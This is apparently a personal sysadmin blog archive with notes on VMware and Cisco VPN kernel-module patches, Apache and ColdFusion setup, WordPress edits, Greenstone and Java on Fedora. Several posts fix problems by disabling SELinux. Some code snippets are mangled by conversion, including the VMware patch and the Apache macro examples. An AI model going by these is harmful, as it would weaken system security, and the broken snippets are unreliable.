/tmp/vmware-config0/vmmon-only/./include/compat_kernel.h:21: error: expected declaration specifiers or ‘...’ before ‘compat_exit’
/tmp/vmware-config0/vmmon-only/./include/compat_kernel.h:21: error: expected declaration specifiers or ‘...’ before ‘exit_code’
/tmp/vmware-config0/vmmon-only/./include/compat_kernel.h:21: warning: type defaults to ‘int’ in declaration of ‘_syscall1’
make[2]: *** [/tmp/vmware-config0/vmmon-only/linux/driver.o] Error 1
make[1]: *** [_module_/tmp/vmware-config0/vmmon-only] Error 2
make[1]: Leaving directory `/usr/src/linux-headers-2.6.20-1-generic'
make: *** [vmmon.ko] Error 2
make: Leaving directory `/tmp/vmware-config0/vmmon-only'
Unable to build the vmmon module.


Here is a patch for the compat_kernel.h in vmmon.tar:

--- compat_kernel.h     2006-11-13 13:06:18.000000000 -0800
+++ ../../vmmon-only.20/include/compat_kernel.h 2006-12-22 07:02:59.000000000 -0800
@@ -18,7 +18,9 @@
* provided by x86-64, arm and other (but not by i386).
*/
#define __NR_compat_exit __NR_exit
+#if LINUX_VERSION_CODE < color="navy">static inline _syscall1(int, compat_exit, int, exit_code);
+#endif


/*

From:
http://www.vmware.com/community/thread.jspa?threadID=65982&tstart=30

Ubuntu specific instructions are here:
http://www.vmware.com/community/message.jspa?messageID=542738#542738

Friday, February 2, 2007

Thursday, February 1, 2007

Dreamweaver / Mac - newline problems

We are having problems with Dreamweaver on Mac replacing the newlines in the file with Mac newline characters. This kills the editing experience for anyone on Windows or Linux... Here is a post with a command line fix for this problem:
http://www.emcken.dk/weblog/archives/67-Substitute-Mac-newlines-with-unix-ones.html

Apache, webDAV, and Frontpage 2003

Frontpage 2003 has a problem when trying to copy a COLLECTION (folder) from an Apache web server using webDAV. Here is a sample packet capture on the web server machine:

34.644550 192.168.1.2 -> 192.168.1.101 HTTP PROPFIND /aboutdbc HTTP/1.1
34.644677 192.168.1.101 -> 192.168.1.2 TCP webcache > 1753 [ACK] Seq=70073 Ack=5546 Win=16779 Len=0
34.647210 192.168.1.101 -> 192.168.1.2 HTTP HTTP/1.1 301 Moved Permanently (text/html)
34.795153 192.168.1.2 -> 192.168.1.101 TCP 1753 > webcache [ACK] Seq=5546 Ack=70648 Win=17065 Len=0
36.026395 192.168.1.2 -> 192.168.1.101 HTTP PROPFIND /aboutdbc HTTP/1.1
36.028916 192.168.1.101 -> 192.168.1.2 HTTP HTTP/1.1 301 Moved Permanently (text/html)
36.196829 192.168.1.2 -> 192.168.1.101 TCP 1753 > webcache [ACK] Seq=6192 Ack=71223 Win=16490 Len=0

Apparently, Frontpage should be including a forward slash at the end of the COLLECTION name:
PROPFIND /aboutus HTTP/1.1

Should be:
PROPFIND /aboutus/ HTTP/1.1

This missing forward slash causes Apache to return a 301 Moved Permanently. The fix is to add:

BrowserMatch “FrontPage” redirect-carefully

To you httpd.conf and restart Apache.

Thanks to Steve’s Rants and Raves! for this fix.

Apache2/mod_macro

Introduction:

We are currently setting up a load-balanced server farm and have greatly simplified configuration by using Fabien Coelho’s mod-macro. Fortunately, the module has recently been ported to work with Apache2, and Debian has a deb package to simplify setup.

$ apt-get install apache2 apache2-utils libapache2-mod-macro

One of the great things about using the apache2 Debian package to install Apache, is that it makes heavy use of include files to allow for finer control over enabling sites and modules.
Here is an example of using an Include directive to “pull in” an external file, (ports.conf), into the apache2.conf, (the main conf file that replaces the standard httpd.conf in the apache2 Debian package).

me@mylap:~$ less /etc/apache2/ports.conf

# Include ports listing
Include /etc/apache2/ports.conf

This single line will pull in the contents of the following file:

me@mylap:~$ cat /etc/apache2/ports.conf
Listen 80

It is that simple. You can see the ease with which one can Include many different files to create a very complex apache2.conf file. (It is possible to use regular expressions to load any number of files into the configuration file as well).

The Problem:

When running a server farm, it becomes apparent that you do not want to handle configuration of the Apache server on each individual machine. Therefore, we searched for a way to use a single set of configuration files for any number of machines. After searching for some time, we settled on mod-macro, a great module written by Fabien Coelho, which “allows the definition and use of macros within apache runtime configuration files.” We found that this module would allow us to set the ip address of the Apache web server based on a variable that was passed to it from the startup script. Here is how we did it:

1. We need to define the macro using the tags. This is the section that you want to perform the variable expansion upon. Here is an example:

webadmin:/export/web# cat /etc/apache2/apache2.conf

### start of the Macro

Listen $ip:80

### end of the Macro

2. Next, we need to include the variable definition based upon the parameter that is passed by the host’s /usr/sbin/apache2ctl file. Find the start stanza in /usr/sbin/apache2ctl and add the following parameter:

startssl|sslstart|start-SSL)
$HTTPD -k start -DSSL -D`hostname`
ERROR=$?
;;

This will pass the hostname of the web server machine as a parameter to Apache. We have chosen the hostname as a simple unique identifier for defining the ip address used in our Apache config. The command above will look like this after the hostname is expanded:

/usr/sbin/apache2 -k start -DSSL -Dmylap

3. Create a file in a central location with the ip address of our web server host. We created this location on an NFS mount located at /export/web/hosts/mylap/ip.txt.

webadmin:/home/speeves# cat /export/web/hosts/mylap/ip.txt
##
## Set the IP Address of the Host
##

Use WebFarmConf “192.168.2.29″

The Use directive tells mod-macro to execute the WebFarmConf Macro, (defined above), with the parameter “192.168.2.29″, (the ip address of the web server machine).

4. We add the following IfDefine section to the end of /etc/apache2/apache2.conf:


Include /export/web/hosts/mylap/ip.txt

The IfDefine section takes the hostname parameter that is passed to the Apache binary, and Includes the appropriate ip.txt file for the web server host. Voila! We can now scale our server farm very quickly, thanks to Fabien Coelho and Mod_Macro.

Important Note on Included files and Mod_Macro:

After finding a note in the source code of mod-macro and then discussing this with Fabien Coelho, we have discovered that you _cannot_ use Include directives within a section. This means that all configuration Directives must be in the section, and can’t be included from another file. We was planning on using this web farm for virtual hosting, and, hence, lost one of the truly interesting aspects of the Debian Apache2 package… including virtual host configuration files.

Here is a simple example using the Listen directive mentioned above:

The Apache2 Debian package has the default configuration:

me@mylap:~$ less /etc/apache2/ports.conf

# Include ports listing
Include /etc/apache2/ports.conf

me@mylap:~$ cat /etc/apache2/ports.conf
Listen 80

I would like to set the section like this:

me@mylap:~$ less /etc/apache2/ports.conf


# Include ports listing
Include /etc/apache2/ports.conf

With the included ports.conf looking like:

me@mylap:~$ cat /etc/apache2/ports.conf
Listen $ip:80

Unfortunately, mod-macro doesn’t know how to deal with these Included files yet. Therefore, we need to alter the default apache2.conf by removing the Include directive like this:

### start of the Macro

Listen $ip:80

### end of the Macro

This means that all virtual host sections will need to be included in a single monolithic apache2.conf, which makes it more difficult to administer large number of virtual hosts.

Conclusion:

Is there a better solution…? We do not have a large number of virtual hosts right now, so the simplicity of mod-macro makes it the best solution for us right now. In the future, as we grow, it might be a good idea to either spend some time modifying mod-macro to work with Include directives, or simply find an alternative, such as using mod_perl to generate large numbers of virtual hosts. We’ll keep you posted as we find out more.

References:
Apache 2.0 module mod_macro

HOW-TO setup Apache 2 with a Coldfusion 7 Cluster on Debian

I am currently setting up ColdFusion MX 7 on Debian Sarge. The setup looks like:

Apache2 - front-end machine - 192.168.208.30
2-ColdFusion MX 7 machines clustered - 192.168.208.40/192.168.208.41

The cluster name is “webcf”.

I installed and setup the ColdFusion MX 7 cluster on two Debian Sarge machines with no problem, (ok, some problems, but it has been a month, so I don’t remember exactly what they were). Clustering was more of a pain, (come on Adobe… Let’s get more documentation on running ColdFusion clusters on JRun 4 servers). I’ll try to remember how I did it, so I can document that as well.

Finally, when I went to setup Apache2 with mod_jrun20.so, I ended up copying all of the /opt/jrun4 directory to the Apache2 machine. Therefore,

$ ls /opt/jrun4

$ jre/bin/java -jar lib/wsconfig.jar -host 192.168.208.40 -cluster webcf -apxs
> -ws apache -dir /etc/apache2/ -v -coldfusion -bin /usr/sbin/apache2 
> -script /usr/sbin/apache2ctl

(Watch out that apache-dev is not installed… It is not needed for building mod_jrun20.so).

The java command above will probably generate the following error:

Found JRun cluster webcf at 192.168.208.40:2902
Found JRun server cfusion at 192.168.208.40:2902
Found JRun server admin at 192.168.208.40:2910
Found JRun server samples at 192.168.208.40:2918
Deleted directory /opt/jrun4/lib/wsconfig/1
Using Apache binary /usr/sbin/apache2
Using Apache control script /usr/sbin/apache2ctl
Parsing Apache configuration file /export/web/apache2/httpd.conf
Exec'ing chmod 777 /opt/jrun4/lib/wsconfig/1
Set permission to 777 on /opt/jrun4/lib/wsconfig/1
Server version: Apache/2.0.54
Exec'ing chmod +x /opt/jrun4/lib/wsconfig/1/build_jrun20
Set permission to execute on /opt/jrun4/lib/wsconfig/1/build_jrun20
Could not find the required apxs (Apache Extension Tool) binary /usr/sbin/apxs.
Could not build A pache2 web server connector from source. 
Use build script /opt/jrun4/lib/wsconfig/1/build_jrun20 .

This is ok. Now:

$ cd /opt/jrun4/lib/wsconfig/1/

Open build_jrun20 in your favourite editor:

$ emacs build_jrun20

And change all instances of /usr/bin/apxs to /usr/bin/apxs2. Once this is complete, save the file and run:

$ ./build_jrun20
/usr/bin/libtool --silent --mode=compile gcc -prefer-pic -pipe
-I/usr/include/xmltok -I/usr/inclu de/openssl -Wall -O2 
-DAP_HAVE_DESIGNATED_INITIALIZER -DLINUX=2 -D_REENTRANT -D_XOPEN_SOURCE=500 
-D_BSD_SOURCE -D_SVID_SOURCE -D_GNU_SOURCE -pipe -I/usr/include/xmltok 
-I/usr/include/openssl -Wa ll -O2 -pthread -I/usr/include/apache2 
-I/usr/include/apr-0 -I/usr/include/apr-0 -I/usr/includ e -w -c 
-o /opt/jrun4/lib/wsconfig/1/mod_jrun20.lo
...
cp /opt/jrun4/lib/wsconfig/1/.libs/mod_jrun20.so /opt/jrun4/lib/wsconfig/1//mod_jrun20.so
cp /opt/jrun4/lib/wsconfig/1/.libs/mod_jrun20.lai /opt/jrun4/lib/wsconfig/1//mod_jrun20.la
cp /opt/jrun4/lib/wsconfig/1/.libs/mod_jrun20.a /opt/jrun4/lib/wsconfig/1//mod_jrun20.a
ranlib /opt/jrun4/lib/wsconfig/1//mod_jrun20.a
chmod 644 /opt/jrun4/lib/wsconfig/1//mod_jrun20.a
libtool: install: warning: remember to run `libtool --finish /usr/lib/apache2/modules'
chmod 644 /opt/jrun4/lib/wsconfig/1//mod_jrun20.so

Now, I symlink the new so to /usr/lib/apache2/modules:

$ ln -s /opt/jrun4/lib/wsconfig/1/mod_jrun20.so /usr/lib/apache2/modules/mod_jrun20.so

Generate the load file to work with the Debian Apache2 package:

$ cat > /etc/apache2/mods-available/cfm.load
LoadModule jrun_module /usr/lib/apache2/modules/mod_jrun20.so
Control-d to quit and save the cfm.load file.
(Or, use your favourite editor and put the following line in /etc/apache2/mods-available/cfm.load:
LoadModule jrun_module /usr/lib/apache2/modules/mod_jrun20.so

).

Now, enable your module:

$ a2enmod cfm

Restart Apache2:

$ /etc/init.d/apache2 restart ( or force-reload )

Random Notes on Install of Ubuntu Dapper Drake on Aspire 1691WLMi

1. Cisco VPN Client:

vpnclient-linux-4.7.00.0640-k9.tar.gz
linux-image-2.6.15-8-386

When running vpn_install, I get the following error:


Shutting down /opt/cisco-vpnclient/bin/vpnclient: module cisco_ipsec is not running.
Stopped: /etc/init.d/vpnclient_init (VPN init script)
Making module
make -C /lib/modules/2.6.15-8-386/build SUBDIRS=/home/speeves/downloads/vpnclient modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.15-8-386'
CC [M] /home/speeves/downloads/vpnclient/linuxcniapi.o
/home/speeves/downloads/vpnclient/linuxcniapi.c: In function ‘CniInjectReceive’:
/home/speeves/downloads/vpnclient/linuxcniapi.c:292: error: ‘struct sk_buff’ has no member named ‘stamp’
/home/speeves/downloads/vpnclient/linuxcniapi.c: In function ‘CniInjectSend’:
/home/speeves/downloads/vpnclient/linuxcniapi.c:432: error: ‘struct sk_buff’ has no member named ‘stamp’
make[2]: *** [/home/speeves/downloads/vpnclient/linuxcniapi.o] Error 1
make[1]: *** [_module_/home/speeves/downloads/vpnclient] Error 2
make[1]: Leaving directory `/usr/src/linux-headers-2.6.15-8-386'
make: *** [default] Error 2
Copying module to directory "/lib/modules/2.6.15-8-386/CiscoVPN".
Already have group 'bin'

This error is described here:
http://jason.roysdon.net/?p=754

And the solution is given here:
http://www.redhat.com/archives/fedora-list/2005-November/msg02105.html

Here is the patch found in the URL above:


--- linuxcniapi.c 2005-11-12 11:53:06.000000000 -0600
+++ 2.6.14-vpnclient-linux-4.7.00.0640-linuxcniapi.c 2005-11-12 11:49:20.000000000 -0600
@@ -276,6 +276,8 @@
struct sk_buff *skb = NULL;
unsigned char *pIP = NULL, *pMac = NULL;

+ struct timeval timecount;
+
/* we need to build the actual sk_buff from the packet structure */
pBinding = (PBINDING) Binding;
lpPacketDescriptor = (LPPACKETDESCRIPTOR) Packet;
@@ -289,7 +291,10 @@
goto exit_gracefully;
}
/* move the data into the packet */
- do_gettimeofday(&skb->stamp);
+ do_gettimeofday(&timecount);
+
+ skb->tstamp.off_sec = (u32) timecount.tv_sec;
+ skb->tstamp.off_usec = (u32) timecount.tv_usec;

pIP = skb_put(skb, lpPacketDescriptor->uiPacketSize);

@@ -389,6 +394,8 @@
unsigned char *pIP = NULL, *pMac = NULL;
int tmp_rc = 0;

+ struct timeval timecount;
+
int (*tmp_InjectSend) (struct sk_buff * skb, struct net_device * dev);
tmp_InjectSend = NULL;

@@ -429,7 +436,10 @@
CniGetPacketData(Packet, 0, lpPacketDescriptor->uiPacketSize, pIP);

/* put the mac header on */
- do_gettimeofday(&skb->stamp);
+ do_gettimeofday(&timecount);
+
+ skb->tstamp.off_sec = (u32) timecount.tv_sec;
+ skb->tstamp.off_usec = (u32) timecount.tv_usec;

skb->dev = pBinding->pDevice;

Using gnome-terminal to simplify web farm maintenance

Gnome-terminal has a wonderful interface for those of us that run many server machines. I run server farms, so was looking for a way to simplify debugging across multiple machines (by tailing the logs on each machine). The following PERL script will open a new gnome-terminal window plus an additional three tabs, all of which are tailing a specified access or error log. This script is Debian-centric, and written to take advantage of gnome-terminal features, but should easily be modified to your favourite distribution

#!/usr/bin/perl

# sample usage: tail.pl www.example.com access
#
# test to see if there are 2 parameter, or if # the first parameter is --help. Also, check to
# see if the 2nd parameter equals "access", or # "error". If not, print the usage line.
if (($#ARGV != 1) || ($ARGV[1] eq "--help") || ( $ARGV[1] !~ m/(access|error)/ ))
{
print "Usage: ".$0." [fqdn] [access|error] \n";
exit;
}

## set the variables
# array of hosts to which we want to connect
@HOSTS=('www1.private.com', 'www2.private.com', 'www3.private.com', 'www4.private.com');

# set $VHOST to the fqdn
$VHOST = $ARGV[0];

# change the periods in the fqdn to underscores
$VHOST =~ s/\./\_/g;

# set $LOG to either "error" or "access"
$LOG=$ARGV[1];

## foreach name in @HOSTS add a new tab to the terminal window and execute the following command:
# ssh -t host --tab -e "ssh -t web2priv4 'tail -f /var/log/apache2/web3_unt_edu_error_log'"
#### This is where you would want to modify this script to make it work with your
#### favorite terminal. foreach $host (@HOSTS)
{
$FLAGS=$FLAGS." --tab -e \"ssh -t ".$host." 'tail -f /var/log/apache2/".$VHOST."_".$LOG."_log' \" " ;
}

$command = "/usr/bin/gnome-terminal ".$FLAGS;
print "$command";
system($command);

VMWare Shared Folders are not mounted after reboot

I have just installed Fedora Core 4 in VMWare on an Ubuntu Dapper Drake host, and found that my “shared folders” were not being mounted into /mnt/hgfs/. After some searching, I came across the following thread with two possible fixes:

1. Posted by chrisbatemen:

1) Check if you have installed selinux-policy-targeted-sources package

rpm -q selinux-policy-targeted-sources

2) If you have not installed selinux-policy-targeted-sources, you have to add it.

yum install selinux-policy-targeted-sources

3) Edit /etc/selinux/targeted/src/policy/domains/program/initrc.te

Comment out the following line

allow initrc_t fs_type:filesystem mount_fs_perms;

Add a line to allow unlabeled_t type to be mounted.

#allow initrc_t fs_type:filesystem mount_fs_perms;
allow initrc_t { fs_type unlabeled_t }:filesystem mount_fs_perms;

File context for vmware-hgfs is unlabeled_t, because any context is not
given currently. The above line allows vmware-hgfs during initrc process.

4) Go to /etc/selinux/targeted/src/policy, run "make install" and "make reload".

Then, SElinux will allow the vmware-hgfs mount operation for the next reboot.

2. posted by alvinmz:

The solution is to disable your selinux.

in your /boot/grub/grub.conf

add "selinux=0" to it. And it will look like:

title Fedora Core (2.6.xxx_FC4)
root (hd0,0)
kernel /vmlinuz-2.6.xxx_FC4 ro selinux=0 root=/dev/VolGroup00/....

Then, reboot, and you will see your shared folders under your /mnt/hgfs/..

I have verified that the first solution worked for me, _but_, as this appears to be associated with SELinux, I would imagine that the second would work as well.
Here is a link to the thread (with a great explanation of the problem by chrisbatemen):

VMTN Discussion Forums: Shared Folders disappeared after reboot …

Wordpress Modification Notes

I am new to Wordpress, but have found it very much to my liking. There seems to be a good community supporting it, and the ease with which I was able to bring it up was nice. Here are a few notes about a features that I didn’t find very intuitive:

1. I plan on using this blog for posting a lot of notes about computers and programs, (including patches and source code). Therefore, I installed the Code Auto Escape plugin from Priyadi Iman Nurcahyo, which helps maintain the formatting of my source code examples:

Priyadi’s Place » Blog Archive » WordPress Plugin: Code Autoescape

2. I wanted to change the header image to include our image from the http://www.erikin.com site. I am using the “default” template, (which I like very much :) ), so I opened path_to_wordpress/wp-content/themes/default/header.php, and made the uncommented:


/* To ease the insertion of a personal header image, I have done it

in such a way, that you simply drop in an image called 'personalheader.jpg'

into your /images/ directory. Dimensions should be at least 760px x 200px.

Anything above that will get cropped off of the image.

*/

/*

#headerimg { background: url('/images/personalheader.jpg') no-repeat top;}

*/

And changed it to:


/* To ease the insertion of a personal header image, I have done it

in such a way, that you simply drop in an image called 'personalheader.jpg'

into your /images/ directory. Dimensions should be at least 760px x 200px.

Anything above that will get cropped off of the image.

*/

/*

#headerimg { background: url('/images/erikin_mountain_new.jpg') no-repeat top;}

*/

I changed the default personalheader.jpg, as I find it easier to keep the namespaces from clashing, (and to find my modifications later).

3. I wanted to add hyperlinks to the sidebar for some of my important sites. Since I am a newbie, I am assuming that there is really a better way to do this, but I just hardcoded the hyperlinks in path_to_wordpress/wp-content/themes/default/sidebar.php. I changed:


<?php wp_list_pages('title_li=
<h2>Pages</h2>
' ); ?>
<li>
<h2>Archives</h2>
<ul>
<?php wp_get_archives('type=monthly'); ?></ul>
</li>


To:


<?php wp_list_pages('title_li=
<h2>Pages</h2>
' ); ?>
<li>
<h2>Links</h2>
<ul>
<a xhref="http://www.dentonbible.org">Denton Bible Church</a></ul>
<ul>
<a xhref="http://www.erikin.com">EriKin Corporation</a></ul>
<ul>
<a xhref="http://www.unt.edu">University of North Texas</a></ul>
<ul>
<a xhref="http://www.unt.edu/webinfo">UNT - Central Web Support</a></ul>
<ul>
<a xhref="http://www.unt.edu/slis">UNT - School of Library and Information Science</a></ul>
</li>
<li>
<h2>Archives</h2>
<ul>
<?php wp_get_archives('type=monthly'); ?></ul>
</li>

This placed my links between the Pages and Archives sections. An interesting trick that I found when trying to add these hyperlinks, was to create a page with the name of the site (ie EriKin Corporation), then add a meta-refresh tag to the page:

<meta http-equiv="refresh" content="0; url=http://www.erikin.com/index/" />

It wasn’t what I wanted, but is something that I will file away for future reference.

4. I wanted to add a copyright notice and a link to the footer. I did this by making the following changes to path_to_wordpress/wp-content/themes/default/footer.php:

<div id="footer">

<?php bloginfo('name'); ?> is proudly powered by
<a xhref="http://wordpress.org/">WordPress</a>

<a xhref="feed:<?php bloginfo('rss2_url'); ?>">Entries (RSS)</a>
and <a xhref="feed:<?php bloginfo('comments_rss2_url'); ?>">Comments (RSS)</a>.

<!-- <?php echo get_num_queries(); ?> queries. <?php timer_stop(1); ?> seconds. --></div>



To:

<div id="footer">
&nbsp;&#xA9;2006 <a xhref="http://www.erikin.com">EriKin Corporation</a>


<?php bloginfo('name'); ?> is proudly powered by
<a xhref="http://wordpress.org/">WordPress</a>

<a xhref="feed:<?php bloginfo('rss2_url'); ?>">Entries (RSS)</a>
and <a xhref="feed:<?php bloginfo('comments_rss2_url'); ?>">Comments (RSS)</a>.

<!-- <?php echo get_num_queries(); ?> queries. <?php timer_stop(1); ?> seconds. --></div>


Unfinished Business:

1. I can’t get mail posting to work. The path_to_wordpress/wp-mail.php returns:

There doesn’t seem to be any new mail."

Though I can see two messages in the /var/mail/bloguser file. Also, /var/log/myphp3server.log shows that Wordpress is logging in and checking the mail… Hmmm… I need to work on debugging this… (Perhaps using netcat?)

2. I couldn’t place an EriKin icon in the footer. For some reason, the icon and link would be stripped out of the footer.php code when it was being rendered. Therefore, I have simply settled on using the text link, (just like the links to Wordpress, etc. at the bottom of the page. Is the CSS stripping out the icon?

Greenstone on Fedora Core 4 (SELinux causing issues with CGI scripts)

When I take the default installs that place the cgi-bin in /usr/local/gsdl/cgi-bin, I am unable to execute the script. The /var/log/httpd/error_log reports:

[Sat Mar 11 23:48:11 2006] [error] [client 127.0.0.1] (13)Permission denied: exec of ‘/usr/local/gsdl/cgi-bin/library’ failed
[Sat Mar 11 23:48:11 2006] [error] [client 127.0.0.1] Premature end of script headers: library

I add the following to my /etc/httpd/conf/httpd.conf file as directed:

 ScriptAlias /cgi-bin/ "/usr/local/gsdl/cgi-bin/"   AllowOverride None Options None Order allow,deny Allow from all  

And an ls -l of the directory shows that permissions should be ok:

[root@localhost cgi-bin]# ls -l
total 3544
-rw-r–r– 1 apache apache 210195 Mar 11 23:23 CGI.pm
-rw-r–r– 1 apache apache 90 Mar 11 23:23 getior
-rwxr-xr-x 1 apache apache 26986 Mar 11 23:23 gliserver.pl
-rw-r–r– 1 apache apache 5426 Mar 11 23:23 gsdlCGI.pm
-rw-r–r– 1 apache apache 1132 Mar 11 23:44 gsdlsite.cfg
-rwxr-xr-x 1 apache apache 2119460 Mar 11 23:43 library
-rwxr-xr-x 1 apache apache 1171468 Mar 11 23:44 oaiserver
-rw-r–r– 1 apache apache 3240 Mar 11 23:23 perl.cgi
-rw-r–r– 1 apache apache 3195 Mar 11 23:23 readresults.cgi
-rw-r–r– 1 apache apache 1337 Mar 11 23:23 trackreport.cgi
-rw-r–r– 1 apache apache 3716 Mar 11 23:23 usabcgi.pm

Apparently, SELinux is causing this issue. The temporary fix was to run:

[root@localhost cgi-bin]# su -
[root@localhost ~]# setenforce 0

According to this post https://www.redhat.com/archives/fedora-list/2005-November/msg00410.html, you can set it permanently by making the following changes in the /etc/selinux/config:

SELINUX=enforcing

To:

SELINUX=permissive

And, rebooting. I haven’t tested this change, but will comment if it does.

Converting mp3 lectures to wav

So, I have found that many universities are starting to post audio versions of their lectures. (Podcasting through iTunes, RAM files, or mp3). I am going on a trip tomorrow, and would like to listen to some of these lectures on my CD Player in my truck… (Old fashioned, I know ;) ). So I needed to convert these files from mp3 to wav for the trip.

I settled on UC Berkeley’s CS162 class, (on their webcasting page ), and downloaded:

Lecture: Synchronization File: 14793.mp3

Here is the command I used to convert it:

mpg123 -b 10000 -s 14973.mp3 | sox -t raw -r 8000 -s -w -c 2 - 14973.wav

The sample rate (-r 8000) is different than most examples, (-r 44100), but I used trial and error to find the right sample rate for the lecture.

Installing Greenstone Digital Library Software on Fedora Core 4

Fedora Core 4 comes with java jre installed, but we need the jdk installed to use the Greenstone Librarians Interface (gli.sh).

To remove the default java packages from Fedora Core 4:

rpm -e –nodeps java-1.4.2-gcj-compat-1.4.2.0-40jpp_31rh

Then, we need to download the j2sdk 1.4.2 from sun.com (it is down today for maintenance, so will get a URL later).

Now, we install the j2sdk-1_4_2_*.rpm (download the newest SDK from http://java.sun.com/j2se/1.4.2/download.html, if you haven’t yet):

chmod 755 j2sdk-1_4_2_11-linux-i586-rpm.bin
./j2sdk-1_4_2_11-linux-i586-rpm.bin

Which yields the following:

Do you agree to the above license terms? [yes or no]
yes
Unpacking…
Checksumming…
0
0
Extracting…
UnZipSFX 5.40 of 28 November 1998, by Info-ZIP (Zip-Bugs@lists.wku.edu).
inflating: j2sdk-1_4_2_11-linux-i586.rpm
Done.

Finally:
rpm -i j2sdk-1_4_2_11-linux-i586.rpm

Now, we export the new java_install/bin directory into the $PATH:
export PATH=$PATH:/usr/java/j2sdk1.4.2_11/bin

Or, to maintain the correct PATH environment variable across multiple sessions, modify the PATH line already found in your ~/.bash_profile to look like:
PATH=$PATH:$HOME/bin:/usr/java/j2sdk1.4.2_11/bin

Next, let’s run the installation script to install gsdl into /usr/local/gsdl:

tar -xzvf gsdl-2.63-unix.tar.gz
cd gsdl-2.63-unix/Unix
./Install.sh

I took all of the defaults. Add the following configuration directives to your httpd.conf file:

ScriptAlias /cgi-bin/ "/usr/local/gsdl/cgi-bin/"
<Directory "/usr/local/gsdl/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>


Alias /gsdl/ "/usr/local/gsdl/"
<Directory "/usr/local/gsdl">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order allow,deny
Allow from all
</Directory>


NOTE: Don’t forget to comment out the default cgi-bin ScriptAlias.

Test the webserver setup by opening your browser and visiting:
http://localhost/cgi-bin/library

Next, we need to do a few things to get the Greenstone Librarians Interface to work:

Enter the /usr/local/gsdl/gli directory and run:

./makegli.sh
./makejar.sh

Run the GLI:
./gli.sh

TROUBLESHOOTING:

If you run:

./gli.sh

and receive the following error:


Running the Greenstone Librarian Interface...
Exception in thread "main" java.lang.UnsatisfiedLinkError: /usr/java/j2sdk1.4.2_09/jre/lib/i386/libawt.so: libXp.so.6: cannot open shared object file: No such file or directory
at java.lang.ClassLoader$NativeLibrary.load(Native Method)
at java.lang.ClassLoader.loadLibrary0(ClassLoader.java:1586)
at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1503)
at java.lang.Runtime.loadLibrary0(Runtime.java:788)
at java.lang.System.loadLibrary(System.java:834)
at sun.security.action.LoadLibraryAction.run(LoadLibraryAction.java:50)
at java.security.AccessController.doPrivileged(Native Method)
at java.awt.Toolkit.loadLibraries(Toolkit.java:1437)
at java.awt.Toolkit.(Toolkit.java:1458)
at java.awt.Color.(Color.java:250)
at javax.swing.plaf.metal.MetalTheme.(MetalTheme.java:32)
at javax.swing.plaf.metal.MetalLookAndFeel.getCurrentTheme(MetalLookAndFeel.java:1294)
at javax.swing.plaf.metal.MetalLookAndFeel.createDefaultTheme(MetalLookAndFeel.java:1226)
at javax.swing.plaf.metal.MetalLookAndFeel.getDefaults(MetalLookAndFeel.java:1233)
at javax.swing.UIManager.setLookAndFeel(UIManager.java:394)
at javax.swing.UIManager.setLookAndFeel(UIManager.java:424)
at org.greenstone.gatherer.GathererProg.main(GathererProg.java:57)
Done!

This is caused by Fedora Core 4 has moving from xfree86 to xorgs (for xwindows). You can fix this by visiting rpmfind.net and installing the following package:
xorg-x11-deprecated-libs-6.8.2-37.FC4.49.2.i386.rpm

PEAR XML_RSS and content:encoded

I am currently working on a project with the PEAR package XML_RSS. This project has need of the ‘content:encoded’ element, but the current STABLE version of XML_RSS (v 1.14) doesn’t grab ‘content:encoded’. To fix this, open /usr/share/php/XML/RSS.php (on Debian) in your favourite editor and change:


/**
* @var array
*/
var $itemTags = array('TITLE', 'LINK', 'DESCRIPTION', 'PUBDATE');

/**
* @var array
*/
var $imageTags = array('TITLE', 'URL', 'LINK');

To:

/**
* @var array
*/
var $itemTags = array('TITLE', 'LINK', 'DESCRIPTION', 'CONTENT:ENCODED', 'PUBDATE');

/**
* @var array
*/
var $imageTags = array('TITLE', 'URL', 'LINK');

The newest version in CVS ( http://cvs.php.net/viewcvs.cgi/pear/XML_RSS/ ) (v 1.26) does contain this element, so I have contacted the maintainer about when the next release will be.

Replace Fedora Core 4 default java with sun-java

To remove the default java packages from Fedora Core 4:

rpm -e –nodeps java-1.4.2-gcj-compat-1.4.2.0-40jpp_31rh

Then, we need to download the j2sdk 1.4.2 from sun.com (it is down today for maintenance, so will get a URL later).

Now, we install the j2sdk-1_4_2_*.rpm (download the newest SDK from http://java.sun.com/j2se/1.4.2/download.html, if you haven’t yet):

chmod 755 j2sdk-1_4_2_11-linux-i586-rpm.bin
./j2sdk-1_4_2_11-linux-i586-rpm.bin

Which yields the following:


Do you agree to the above license terms? [yes or no]
yes
Unpacking…
Checksumming…
0
0
Extracting…
UnZipSFX 5.40 of 28 November 1998, by Info-ZIP (Zip-Bugs@lists.wku.edu).
inflating: j2sdk-1_4_2_11-linux-i586.rpm
Done.

Finally:
rpm -i j2sdk-1_4_2_11-linux-i586.rpm

Now, we export the new java_install/bin directory into the $PATH:
export PATH=$PATH:/usr/java/j2sdk1.4.2_11/bin

Or, to maintain the correct PATH environment variable across multiple sessions, modify the PATH line already found in your ~/.bash_profile to look like:
PATH=$PATH:$HOME/bin:/usr/java/j2sdk1.4.2_11/bin

rpm tricks

I come from a Debian background, so I find the rpm tool to be a little oblique and slow. Thankfully, there is a lot of documentation to help you wade through the options of this beast of a package manager. The following is a list of important combinations of flags for my work so far:

$ rpm -ql

view the locations of the installed package file. ie:

[root@localhost data]# rpm -ql tomcat5
/etc/logrotate.d/tomcat5
/etc/rc.d/init.d/tomcat5
/etc/tomcat5
/etc/tomcat5/Catalina
/etc/tomcat5/Catalina/localhost
/etc/tomcat5/catalina.policy
/etc/tomcat5/catalina.properties

$ rpm -qa | grep tomcat

query the rpm database for installed packages. ie:

[root@localhost data]# rpm -qa | grep tomcat
tomcat5-5.0.30-5jpp_6fc
tomcat5-jasper-5.0.30-5jpp_6fc
tomcat5-webapps-5.0.30-5jpp_6fc
tomcat5-servlet-2.4-api-5.0.30-5jpp_6fc
$ rpm -e –nodeps

remove a package without complaining about dependencies. Great for replacing the standard install of java on Fedora Core 4 with Sun Java, or reinstalling a borked application.

How to really install Sun Java on Fedora Core

I have run into the following link:

http://www.fedorafaq.org/#java

which details the “real” way to install Sun Java on Fedora core… Though I have found the wonderful /usr/sbin/update-alternatives tool, (which allows you to specify your default applications):

/usr/sbin/update-alternatives --config java

I continue to be frustrated by the slowness of yum and rpm for package management…

Exim4 Quick Reference

Here is a short quick reference for managing the mail queue with Exim4:

































exim -bpmailq — The mailq is relevant as it gives your the email IDs.
